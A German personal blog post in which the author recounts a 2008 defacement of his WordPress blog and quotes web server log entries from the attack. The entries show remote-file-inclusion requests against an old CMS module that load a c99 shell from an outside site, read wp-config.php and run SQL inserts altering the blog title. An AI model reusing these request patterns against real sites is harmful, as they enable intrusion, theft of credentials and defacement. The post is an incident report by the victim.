Am 30.05.2008 hat es mein kleines Blog erwischt. Eine Person der XTech Group hat doch tatsächlich per SQL-Injection einige Einträge in der WordPress-Datenbank geändert. Zum Glück habe ich ja Backup’s. Das habe ich gleich als Anlass für ein Upgrade auf die aktuelle WPD Version genutzt. Nunja, eigentlich konnte wordpress nichts für den deface. Die Pseudo-hacker nutzten ein Script eines früheren CMS, um die wpp-config.php auszulesen. Anschließend wurden mit einigen SQL-Query’s diverse Datensätze in der MySQL Datenbank geändert. Unter anderem auch der Blog-title und die Blod-Description. Was soll’s. auch ganz lustig anzuschauen waren die Request-Header in den Logfiles des Webservers. Dort ließ sich der deface quasi Nachstellen. Hier einige Einträge:

GET http://anb-networkz.net/html/modules/contact/main.php?this_module_path
=http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&act=f&
f=wp-config.php&d=%2Fwww%2Fhtdocs%2Fv100329&"
POST /html/modules/contact/main.php?this_module_path=
http%3A%2F%2Fwww.mitsubishimania.de%2Fjs%2F1337c99.txt%3F%3F&
act=sql&sql_login=*******&sql_passwd=**********&
sql_server=localhost&sql_port=3306&sql_db=***&
sql_tbl_act=insert&sql_tbl=wp_options&sql_tbl_ls=0&
sql_tbl_le=30&sql_tbl_insert_q=+%60option_id%60+%3D+
%272%27+AND+%60blog_id%60+%3D+%270%27+AND+%60option_name%
60+%3D+%27blogname%27+AND+%60option_value%60+%3D+
%27..%3A%3AANB-Networkz%3A%3A..%27+AND+%60autoload%60+
%3D+%27yes%27+

Der Aufrufe wurden von 203.162.2.133 ausgelöst, und nutzten Scripte einer (warscheinlich gehackten) website. Da sich dort ein Forum befindet, werde ich das gleich mal dort Posten.

Ich habe nun nur noch WordPress auf diesem Webspace, alle Kennwörter wurden geändert und eine obligatorische Anzeige gegen unbekannt eingereicht. Mal sehen was passiert